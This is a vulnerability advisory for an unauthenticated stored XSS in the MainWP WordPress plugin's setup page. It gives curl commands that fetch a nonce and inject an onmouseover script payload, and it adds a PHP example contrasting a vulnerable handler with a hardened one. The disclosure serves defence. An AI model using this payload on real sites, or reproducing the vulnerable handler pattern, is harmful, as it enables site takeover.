After installing MainWP the plugin presents a quick setup panel which asks the administrator to select and enter some configuration options. When requested in a certain way (through admin-post.php, as in the proof of concept below), the quick setup page doesn’t require login and anyone can alter the settings.
Proof of concept: first, a nonce is retrieved with the first UNIX command below; the second command then submits the payload using that nonce:
curl 'http://WEBSITE/wp-admin/admin-post.php?page=mainwp-setup&step=installation' | grep _wpnonce
curl -F 'mwp_setup_purchase_username=aaa" onmouseover=alert(/xss/);//' -F mwp_setup_purchase_passwd=bbb -F save_step=1 'http://WEBSITE/wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension&_wpnonce=NONCE_FROM_PREVIOUS_COMMAND'
The script is stored in the WordPress options database. When any administrator next views the MainWP Extensions setting panel, the script will be executed, showing an alert box.
As with other WordPress XSS bugs, the impact of this bug is normally server-side code execution, because the script can, for example, use AJAX requests to access the theme and plugin editors.
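To show the defensive pattern, here is an added example (hypothetical code, not MainWP's own) of a setup-step handler hooked on admin_init, which admin-post.php fires even for unauthenticated requests, first in a vulnerable shape matching the bug described above and then hardened. The option name mwp_setup_purchase_username comes from the proof of concept; the function names and the nonce action 'hypo-setup' are assumptions.

```php
<?php
// Added example, not MainWP's code. Hypothetical setup-step handler on admin_init,
// which admin-post.php fires for unauthenticated requests too.

// BEFORE (vulnerable pattern): no login/capability check, raw value stored,
// raw value echoed back into an attribute.
function hypo_setup_step_vulnerable() {
    if ( ! isset( $_GET['page'] ) || 'mainwp-setup' !== $_GET['page'] ) {
        return;
    }
    if ( isset( $_POST['save_step'] ) && wp_verify_nonce( $_POST['_wpnonce'] ?? '', 'hypo-setup' ) ) {
        // A nonce only proves the form was rendered, and it is rendered to anyone.
        update_option( 'mwp_setup_purchase_username', $_POST['mwp_setup_purchase_username'] );
    }
    $user = get_option( 'mwp_setup_purchase_username', '' );
    echo '<input name="mwp_setup_purchase_username" value="' . $user . '">'; // stored XSS sink
    wp_nonce_field( 'hypo-setup' );
}

// AFTER (hardened): authenticate and authorise first, then the CSRF check,
// sanitise on write, escape on output.
function hypo_setup_step_hardened() {
    if ( ! isset( $_GET['page'] ) || 'mainwp-setup' !== $_GET['page'] ) {
        return;
    }
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    if ( isset( $_POST['save_step'] ) ) {
        check_admin_referer( 'hypo-setup' ); // dies on a missing or invalid nonce
        $value = sanitize_text_field( wp_unslash( $_POST['mwp_setup_purchase_username'] ?? '' ) );
        update_option( 'mwp_setup_purchase_username', $value );
    }
    $user = get_option( 'mwp_setup_purchase_username', '' );
    echo '<input name="mwp_setup_purchase_username" value="' . esc_attr( $user ) . '">';
    wp_nonce_field( 'hypo-setup' );
}
add_action( 'admin_init', 'hypo_setup_step_hardened' );
```

The key point for reviewers is that a nonce check is not an authentication or authorisation check; the capability test must come before any state change, and option values must be escaped for the context they are printed into.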
MainWP was notified on April 18. The latest MainWP update addresses this vulnerability. A bug bounty of $50 was awarded.
The vulnerability was discovered and researched by Jouko Pynnönen of Klikki Oy, Finland.